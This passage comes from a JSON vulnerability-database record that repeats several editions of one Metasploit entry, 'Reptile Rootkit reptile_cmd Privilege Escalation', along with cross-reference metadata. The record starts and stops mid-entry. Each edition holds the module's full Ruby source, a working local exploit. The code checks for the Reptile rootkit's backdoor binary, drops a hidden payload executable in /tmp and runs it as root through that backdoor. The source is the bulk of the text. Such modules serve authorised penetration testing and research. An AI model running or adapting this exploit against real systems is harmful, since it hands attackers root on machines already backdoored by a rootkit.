["DEBIAN_DSA-4600.NASL", "OPENSUSE-2020-2.NASL", "VMWARE_HORIZON_VIEW_AGENT_VMSA-2019-0023.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892062"]}], "modified": "2020-01-13T03:48:23"}, "score": {"value": 4.1, "vector": "NONE", "modified": "2020-01-13T03:48:23"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-01-13T03:48:23", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-01-18T09:52:46", "history": [], "viewCount": 20, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0127"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:F0E638B184ADED0157B4F61C6D70B6AE"]}, {"type": "threatpost", "idList": ["THREATPOST:3D6A5E941AEA9BC7139452558412C5EA", "THREATPOST:0785CB3B3C39E8CA99DEDE80E9BC8192"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:734DF4D73065689285B7BA533D280553"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:4DBFE81CA3EF71B50BEE0CEA26E1373E"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:B2094018923AC88282ED4B94CB24F28B"]}, {"type": "talosblog", "idList": ["TALOSBLOG:340B43701E5CA96D8B4491CD801FE010", "TALOSBLOG:A841859916AA26CF6EF3F3F403502778"]}, {"type": "kitploit", "idList": ["KITPLOIT:974845550621832221"]}, {"type": "f5", "idList": ["F5:K70933496"]}, {"type": "cve", "idList": ["CVE-2019-15742"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2020-0122.NASL", "OPENSUSE-2020-67.NASL", "SMB_NT_MS17_JUN_4022715_CVE-2017-8529.NASL", "NVIDIA_GEFORCE_EXPERIENCE_3_20_2.NASL", "FEDORA_2020-4C8A066B83.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155987"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143364"]}], "modified": "2020-01-18T09:52:46"}, "score": {"value": 4.7, "vector": "NONE", "modified": "2020-01-18T09:52:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-01-18T09:52:46", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-01-18T11:28:05", "history": [], "viewCount": 20, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0127"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:F0E638B184ADED0157B4F61C6D70B6AE"]}, {"type": "threatpost", "idList": ["THREATPOST:3D6A5E941AEA9BC7139452558412C5EA", "THREATPOST:0785CB3B3C39E8CA99DEDE80E9BC8192"]}, {"type": "cve", "idList": ["CVE-2019-19339", "CVE-2019-17635", "CVE-2019-17634", "CVE-2019-14629", "CVE-2019-14596", "CVE-2019-14600", "CVE-2019-14613", "CVE-2019-14615", "CVE-2019-14601"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:734DF4D73065689285B7BA533D280553"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:4DBFE81CA3EF71B50BEE0CEA26E1373E"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:B2094018923AC88282ED4B94CB24F28B"]}, {"type": "talosblog", "idList": ["TALOSBLOG:340B43701E5CA96D8B4491CD801FE010"]}, {"type": "kitploit", "idList": ["KITPLOIT:974845550621832221"]}, {"type": "f5", "idList": ["F5:K70933496"]}], "modified": "2020-01-18T11:28:05"}, "score": {"value": 3.8, "vector": "NONE", "modified": "2020-01-18T11:28:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-01-18T11:28:05", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-01-19T05:30:47", "history": [], "viewCount": 20, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:5811407442918867054"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2068-1:83234"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0127"]}, {"type": "nessus", "idList": ["PHOTONOS_PHSA-2020-3_0-0047_ONIGURUMA.NASL", "PHOTONOS_PHSA-2020-3_0-0047_UNBOUND.NASL", "PHOTONOS_PHSA-2020-3_0-0047_HAPROXY.NASL", "PHOTONOS_PHSA-2020-3_0-0047_LIBXSLT.NASL", "PHOTONOS_PHSA-2020-3_0-0047_RUBY.NASL", "PHOTONOS_PHSA-2020-3_0-0047_LIBSSH2.NASL", "PHOTONOS_PHSA-2019-3_0-0046_LINUX.NASL", "PHOTONOS_PHSA-2020-3_0-0048_OPENSSL.NASL", "PHOTONOS_PHSA-2019-3_0-0046_LOGSTASH.NASL"]}, {"type": "ubuntu", "idList": ["USN-4225-2"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:F0E638B184ADED0157B4F61C6D70B6AE"]}, {"type": "threatpost", "idList": ["THREATPOST:3D6A5E941AEA9BC7139452558412C5EA"]}, {"type": "cve", "idList": ["CVE-2019-19339", "CVE-2019-17635", "CVE-2019-17634"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:734DF4D73065689285B7BA533D280553"]}], "modified": "2020-01-19T05:30:47"}, "score": {"value": 5.1, "vector": "NONE", "modified": "2020-01-19T05:30:47"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-01-19T05:30:47", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-01-19T07:57:53", "history": [], "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:5811407442918867054"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2068-1:83234"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0127"]}, {"type": "nessus", "idList": ["PHOTONOS_PHSA-2020-3_0-0047_LIBXSLT.NASL", "PHOTONOS_PHSA-2020-3_0-0047_ONIGURUMA.NASL", "PHOTONOS_PHSA-2020-3_0-0047_UNBOUND.NASL", "PHOTONOS_PHSA-2020-3_0-0047_HAPROXY.NASL", "PHOTONOS_PHSA-2019-3_0-0046_LINUX.NASL", "PHOTONOS_PHSA-2020-3_0-0047_RUBY.NASL", "PHOTONOS_PHSA-2020-3_0-0047_LIBSSH2.NASL", "PHOTONOS_PHSA-2020-3_0-0048_OPENSSL.NASL", "PHOTONOS_PHSA-2019-3_0-0046_LOGSTASH.NASL"]}, {"type": "ubuntu", "idList": ["USN-4225-2"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:F0E638B184ADED0157B4F61C6D70B6AE"]}, {"type": "threatpost", "idList": ["THREATPOST:3D6A5E941AEA9BC7139452558412C5EA"]}, {"type": "cve", "idList": ["CVE-2019-17635", "CVE-2019-19339", "CVE-2019-17634"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:734DF4D73065689285B7BA533D280553"]}], "modified": "2020-01-19T07:57:53"}, "score": {"value": 5.1, "vector": "NONE", "modified": "2020-01-19T07:57:53"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-01-19T07:57:53", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-01-25T15:40:41", "history": [], "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:E8652E1BB040732546FCCC69B1A525B7"]}, {"type": "github", "idList": ["GHSA-GP2M-7CFP-H6GF"]}, {"type": "cve", "idList": ["CVE-2019-1414", "CVE-2019-19363", "CVE-2019-18900", "CVE-2019-3699", "CVE-2019-3697", "CVE-2019-3694", "CVE-2019-3693", "CVE-2019-3692", "CVE-2019-3687"]}, {"type": "kitploit", "idList": ["KITPLOIT:6686070506690737506", "KITPLOIT:2194899363630238471"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5580DA521260B9BF8D9070DC80D90F12"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:236909F7E19DCF673F9C6AC2C32F6E51", 